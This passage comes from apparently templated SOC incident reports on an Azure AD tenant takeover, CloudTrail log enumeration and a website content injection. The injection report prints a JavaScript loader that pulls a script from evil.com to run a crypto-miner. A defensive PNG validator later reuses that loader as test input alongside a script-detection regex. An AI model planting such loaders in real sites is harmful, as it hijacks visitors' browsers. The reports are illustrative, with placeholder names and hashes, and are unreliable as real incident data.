```
10:30 – Account compromised
10:45 – Attacker logs in
11:15-11:30 – Malicious actions
11:30 – Alert
11:32 – SOC investigates
11:33 – jwilson account disabled
11:35 – Reversion of changes begins
11:50 – All changes reverted
```
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Account:
– jwilson (compromised)
– attacker@evil.com (added as Global Admin, now removed)
App:
– “Internal Tools” (malicious app, removed)
4. Containment Actions:
Immediate Actions:
Disabled jwilson account.
Removed attacker@evil.com from Global Admins.
Deleted “Allow All” conditional access policy.
Reverted federation settings to original.
Deleted malicious app “Internal Tools”.
Reset passwords for all affected users (CEO, CFO, CTO, IT admins).
Blocked attacker IP.
Post-Incident:
Enforced MFA for all admins.
Implemented Privileged Identity Management (JIT access).
Audited all recent admin actions.
5. Root Cause Analysis:
Primary Cause: Global admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
No alerts for critical admin changes.
6. Business Impact:
Operational Impact: Temporary disruption during recovery.
Data Exposure: Potential mailbox access; none confirmed.
Reputational Impact: High (tenant takeover).
7. Remediation & Prevention:
Completed Actions:
Changes reverted.
Account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Implemented Conditional Access policies requiring trusted locations.
Enabled Azure AD Identity Protection alerts for admin changes.
Deployed Privileged Identity Management.
8. Conclusion:
An attacker compromised a global admin account and performed critical cloud administration commands, attempting to take over the Azure AD tenant. Azure AD detected the anomalous activity, enabling rapid reversion of all changes and securing the account.
Closure Rationale: Malicious changes reverted; admin account secured; tenant protected.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 12:30 EST
179. T1654 – Log Enumeration (CloudTrail Detection)
CloudTrail Alert Details
**Alert ID:** CLOUDTRAIL-LOG-ENUM-1654-7842
**Alert Time:** 2024-03-14 16:30:45 EST
**Severity:** MEDIUM (68/100)
**Source:** AWS CloudTrail + GuardDuty
**Rule:** “Anomalous CloudTrail Log Access”
**MITRE ATT&CK:** T1654 – Log Enumeration
Alert Details:
Detection: IAM user enumerating CloudTrail trails and logs
**IAM User:** dev_user (developer account)
**Source IP:** 185.143.221[.]89 (Bulgaria)
**Time:** 16:15-16:30 EST
API Calls (CloudTrail):
```
16:15:10 – cloudtrail:DescribeTrails (list all trails) – SUCCESS
16:15:45 – cloudtrail:GetTrailStatus (get status of each trail) – SUCCESS
16:16:22 – cloudtrail:LookupEvents (search logs for specific users/actions) – SUCCESS
16:17:05 – cloudtrail:LookupEvents (search for "CreateUser") – SUCCESS
16:17:48 – cloudtrail:LookupEvents (search for "ConsoleLogin") – SUCCESS
16:18:30 – s3:ListObjects on bucket: company-cloudtrail-logs (trail logs) – SUCCESS
16:19:15 – s3:GetObject on log file 123456789012_CloudTrail_us-east-1_20240314T1600Z.json (downloaded)
16:20:00 – s3:GetObject on another log file (downloaded)
```
Detection Logic:
dev_user has no legitimate need to access CloudTrail logs
Source IP unusual (Bulgaria)
LookupEvents used to search for specific activities
Log files downloaded from S3
Pattern matches attacker checking what logs exist and what they record
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CloudTrail logs | CloudTrail Console, GuardDuty | Confirmed log enumeration and download |
| 2. Account Investigation | Check dev_user activity | AWS IAM, CloudTrail | Developer account compromised (phishing) |
| 3. Immediate Action | Rotate access keys | AWS IAM | dev_user keys rotated |
| 4. Log Access Restriction | Revoke unnecessary permissions | IAM Policy | Removed CloudTrail and S3 log access |
| 5. Impact Assessment | Determine what logs were accessed | CloudTrail | Attacker downloaded logs containing 2 weeks of API activity |
| 6. Account Remediation | Disable dev_user temporarily | AWS IAM | Account disabled; password reset |
Jira Incident Report
**Ticket:** SOC-2024-219
**Summary:** T1654 – Log Enumeration: Attacker Accesses and Downloads CloudTrail Logs
**Status:** RESOLVED
**Resolution:** MALICIOUS – Logs Accessed, Permissions Revoked
**Priority:** P2 – MEDIUM
**Labels:** T1654, log-enumeration, cloudtrail, guardduty, compromised-account
**Components:** Cloud-Security, Logging
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: AWS CloudTrail + GuardDuty.
Alert: “Anomalous CloudTrail Log Access”.
IAM User: dev_user (developer account).
Source IP: 185.143.221[.]89 (Bulgaria).
Activity: Described trails, looked up events, downloaded 2 log files.
Time: 2024-03-14 16:30 EST.
Technique: MITRE ATT&CK T1654 – Log Enumeration.
2. Technical Analysis:
Attack Chain:
```
15:30 – dev_user account compromised (phishing)
15:45 – Attacker logs into AWS from Bulgaria
16:00 – Attacker enumerates CloudTrail logs
16:15-16:30 – Log enumeration and download
16:30 – GuardDuty detects
```
Logs Downloaded:
123456789012_CloudTrail_us-east-1_20240314T1600Z.json (2 weeks of API calls)
Another file with additional logs
Total: 2 files, ~5 MB
Information in Logs:
All API calls made by all users in the account
Includes sensitive operations (IAM changes, S3 access, Lambda creations)
Attacker can analyze logs to understand environment and avoid detection
Attacker Intent:
Reconnaissance: see what activities are logged
Identify which actions might trigger alerts
Plan further attacks
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
```
15:30 – Account compromised
15:45 – Attacker logs in
16:00-16:30 – Log enumeration
16:30 – Alert
16:32 – SOC investigates
16:33 – Keys rotated
16:34 – Permissions revoked
```
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
API Calls:
– cloudtrail:DescribeTrails
– cloudtrail:LookupEvents
– s3:GetObject on cloudtrail bucket
Account:
– dev_user (compromised)
4. Containment Actions:
Immediate Actions:
Rotated dev_user access keys.
Removed CloudTrail and S3 log access from IAM policy.
Blocked attacker IP.
Disabled account temporarily.
Post-Incident:
Reviewed CloudTrail logs for further malicious activity.
No evidence of other actions.
Account Remediation:
Enforced MFA.
5. Root Cause Analysis:
Primary Cause: Developer account compromised via phishing.
Contributing Factors:
No MFA on account.
Excessive permissions (could access logs).
6. Business Impact:
Operational Impact: None.
Data Exposure: 2 weeks of CloudTrail logs exposed; no customer data.
7. Remediation & Prevention:
Completed Actions:
Keys rotated.
Permissions restricted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented least privilege IAM policies.
Enabled GuardDuty with log access alerts.
8. Conclusion:
An attacker compromised a developer account and enumerated CloudTrail logs, downloading 2 weeks of API activity. GuardDuty detected the anomalous log access, enabling revocation of permissions. The logs contained no customer data but could aid further attacks.
Closure Rationale: Logs accessed; permissions revoked; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 17:30 EST
180. T1659 – Content Injection (Imperva WAF Detection)
Imperva WAF Alert Details
**Alert ID:** IMPERVA-CONTENT-INJECT-1659-7842
**Alert Time:** 2024-03-14 10:30:22 EST
**Severity:** HIGH (85/100)
**Source:** Imperva Web Application Firewall
**Rule:** “Suspicious Content Injection Detected – JavaScript Added”
**MITRE ATT&CK:** T1659 – Content Injection
Alert Details:
Detection: Malicious JavaScript injected into website pages
**Target:** www.company.com (Public Website)
**Time:** 10:15-10:30 EST
Injection Details:
Attacker exploited vulnerable file upload to replace logo.png with malicious image
Image contains embedded JavaScript (steganography)
JavaScript loads from malicious domain and injects crypto-miner
Sequence:
```
10:15:22 – POST /admin/upload.php (file upload: logo.png)
10:15:45 – File uploaded successfully
10:16:12 – GET /images/logo.png (served to visitors)
10:16:30 – JavaScript in image executes in visitor browsers
10:17:00 – Visitors redirected to malicious ad server
10:18:00 – Crypto-miner loaded in background
```
Imperva Detection:
WAF detected anomalous file upload (image with embedded script)
Post-analysis: logo.png contains JavaScript in EXIF metadata
JavaScript: document.write(”)
Impact:
All visitors to website (10,000+ in 15 minutes) exposed to malicious script
Crypto-miner runs in their browsers
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Imperva alert | Imperva WAF Console | Confirmed content injection attack |
| 2. Immediate Action | Remove malicious image | Web Team | Replaced logo.png with clean version |
| 3. Vulnerability Assessment | Identify how injection occurred | Code Review | File upload endpoint allowed image with embedded script |
| 4. Patch Vulnerability | Fix file upload validation | Web Team | Implemented strict MIME type checking and content validation |
| 5. IP Blocking | Block attacker IP | WAF, Firewall | 185.143.221[.]89 blocked |
| 6. PR Response | Monitor for customer complaints | PR Team | No significant complaints; issue resolved quickly |
Jira Incident Report
**Ticket:** SOC-2024-220
**Summary:** T1659 – Content Injection via Malicious Image with Embedded JavaScript
**Status:** RESOLVED
**Resolution:** MALICIOUS – Content Removed, Vulnerability Patched
**Priority:** P2 – MEDIUM
**Labels:** T1659, content-injection, waf, imperva, defacement
**Components:** Web-Security, Application-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Imperva Web Application Firewall.
Alert: “Suspicious Content Injection Detected – JavaScript Added”.
Target: www.company.com.
Method: Malicious image (logo.png) with embedded JavaScript.
Impact: 10,000+ visitors exposed to crypto-miner.
Time: 2024-03-14 10:30 EST.
Technique: MITRE ATT&CK T1659 – Content Injection.
2. Technical Analysis:
Attack Chain:
```
10:00 – Attacker scans for vulnerable file upload
10:05 – Finds /admin/upload.php (no authentication)
10:15 – Uploads logo.png (image with embedded JavaScript in EXIF)
10:16 – Image served to all visitors
10:17-10:30 – Malicious script loads crypto-miner in visitor browsers
10:30 – Imperva detects
```
Malicious Image:
File: logo.png (appears normal)
EXIF metadata: Contains JavaScript
JavaScript:
```javascript
var s = document.createElement('script');
s.src = 'https://evil.com/analytics.js';
document.head.appendChild(s);
```
analytics.js: Loads Coinhive crypto-miner (Monero)
Impact:
10,000+ visitors affected (estimated 15 minutes)
Their CPU used for mining
No data stolen
Vulnerability:
Upload endpoint allowed images without validating content
No authentication on admin functions
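The upload-side control from the remediation list (strict type checking plus content validation), shown as an added example that is not the company's upload code: a PNG validator that sniffs the file signature against the declared MIME type, walks and CRC-checks every chunk, refuses bytes after IEND (the usual place a polyglot hides a second payload), reports metadata chunks (where the script text sat in this incident) and can strip them before the file is published. The 1x1 test images are constructed in memory; the script regex is only a triage signal, because the control is that metadata never reaches the published file, whatever it contains.

```python
"""Validate an uploaded PNG before publication: sniff the real type, walk the chunk
structure, refuse polyglot trailers, and reject or strip metadata chunks (tEXt, zTXt,
iTXt, eXIf) where script text was hidden in this incident.

Added example, not part of the incident report or of the company's upload code.
Sample images are constructed in memory.
"""
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
CRITICAL_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}
METADATA_CHUNKS = {b"tEXt", b"zTXt", b"iTXt", b"eXIf"}
SCRIPT_PATTERN = re.compile(rb"<script|javascript:|document\.|window\.|eval\(|\.src\s*=", re.I)


class InvalidImage(ValueError):
    pass


def iter_png_chunks(data):
    """Yield (type, payload) per chunk, checking signature, lengths and CRCs, and
    refusing any bytes after IEND."""
    if not data.startswith(PNG_SIGNATURE):
        raise InvalidImage("bad PNG signature")
    pos, saw_iend = len(PNG_SIGNATURE), False
    while pos < len(data) and not saw_iend:
        if pos + 8 > len(data):
            raise InvalidImage("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(payload) != length or len(crc) != 4:
            raise InvalidImage(f"truncated chunk {ctype!r}")
        if struct.unpack(">I", crc)[0] != zlib.crc32(ctype + payload) & 0xFFFFFFFF:
            raise InvalidImage(f"bad CRC in chunk {ctype!r}")
        yield ctype, payload
        pos += 12 + length
        saw_iend = ctype == b"IEND"
    if not saw_iend:
        raise InvalidImage("missing IEND")
    if pos != len(data):
        raise InvalidImage("trailing bytes after IEND")


def _metadata_text(ctype, payload):
    """Text carried by a metadata chunk; zTXt is zlib-compressed after keyword + method byte."""
    if ctype == b"zTXt":
        keyword, _, rest = payload.partition(b"\x00")
        try:
            return keyword + b" " + zlib.decompress(rest[1:])
        except zlib.error:
            return payload
    return payload


def validate_upload(data, declared_mime):
    """Report on an upload; `ok` is True only for a sound PNG with no metadata chunks."""
    report = {"ok": False, "reasons": [], "metadata_chunks": [], "script_like": False}
    if declared_mime != "image/png":
        report["reasons"].append(f"declared type {declared_mime!r} is not image/png")
    try:
        for ctype, payload in iter_png_chunks(data):
            if ctype in METADATA_CHUNKS:
                report["metadata_chunks"].append(ctype.decode("ascii"))
                if SCRIPT_PATTERN.search(_metadata_text(ctype, payload)):
                    report["script_like"] = True
    except InvalidImage as exc:
        report["reasons"].append(str(exc))
    if report["metadata_chunks"]:
        report["reasons"].append("metadata chunks present: " + ",".join(report["metadata_chunks"]))
    report["ok"] = not report["reasons"]
    return report


def _chunk(ctype, payload):
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload) & 0xFFFFFFFF)


def sanitize_png(data):
    """Re-emit the image keeping only critical chunks, so no metadata survives publication."""
    return PNG_SIGNATURE + b"".join(_chunk(t, p) for t, p in iter_png_chunks(data) if t in CRITICAL_CHUNKS)


# Constructed 1x1 greyscale PNG, and a copy carrying the loader snippet from this report
# inside a tEXt chunk, used only as validator test input.
_IHDR = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
_IDAT = zlib.compress(b"\x00\x00")  # filter byte + one grey pixel
CLEAN_PNG = PNG_SIGNATURE + _chunk(b"IHDR", _IHDR) + _chunk(b"IDAT", _IDAT) + _chunk(b"IEND", b"")
_LOADER = b"var s=document.createElement('script');s.src='https://evil.com/analytics.js';document.head.appendChild(s);"
TAINTED_PNG = (PNG_SIGNATURE + _chunk(b"IHDR", _IHDR) + _chunk(b"tEXt", b"Comment\x00" + _LOADER)
               + _chunk(b"IDAT", _IDAT) + _chunk(b"IEND", b""))

if __name__ == "__main__":
    print("clean   :", validate_upload(CLEAN_PNG, "image/png"))
    print("tainted :", validate_upload(TAINTED_PNG, "image/png"))
    print("stripped:", validate_upload(sanitize_png(TAINTED_PNG), "image/png"))
```

For JPEG uploads the equivalent containers are the APP1 (EXIF) and COM segments; re-encoding every image through an image library is the stronger general control, since it discards everything that is not pixel data. Keep the `script_like` flag as an alert source: a metadata chunk that matches the pattern is a reason to look at the uploading session, not just to strip the file.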
3. Investigation Findings:
Timeline:
```
10:00 – Attack begins
10:15 – Upload
10:16-10:30 – Malicious content served
10:30 – Alert
10:32 – SOC investigates
10:33 – Image replaced
10:35 – Vulnerability patched
```
Indicators of Compromise (IoCs):
File:
– logo.png (SHA256: a1b2c3d4…) – replaced
Network:
– evil.com (blocked)
– 185.143.221[.]89 (attacker IP)
4. Containment Actions:
Immediate Actions:
Replaced logo.png with clean version.
Blocked attacker IP.
Blocked evil.com domain.
Cleared browser cache (forced via version change).
Vulnerability Remediation:
Added authentication to upload endpoint.
Implemented strict MIME type checking.
Added content validation (scan for embedded scripts).
Deployed WAF rule to block image uploads with embedded code.
PR Response:
Monitored social media (no backlash).
No customer complaints received.
5. Root Cause Analysis:
Primary Cause: Unauthenticated file upload with insufficient validation.
Contributing Factors:
No authentication on admin functions.
No content validation for images.
6. Business Impact:
Operational Impact: Website served malicious content for 15 minutes.
Reputational Impact: Minimal (quick recovery, low awareness).
Financial Impact: None.
7. Remediation & Prevention:
Completed Actions:
Malicious content removed.
Vulnerability patched.
Attacker blocked.
Technical Controls Enhanced:
Added authentication to all admin functions.
Implemented content validation for uploaded files.
Deployed WAF rules for content injection.
8. Conclusion:
An attacker exploited an unauthenticated file upload to inject malicious JavaScript into the company website, causing visitors’ browsers to mine cryptocurrency. Imperva detected the attack, enabling rapid removal and patching. No data was stolen.
Closure Rationale: Content removed; vulnerability patched; attacker blocked.
Analyst: [Your Name], SOC Analyst Date: 2024-03-14 11:30 EST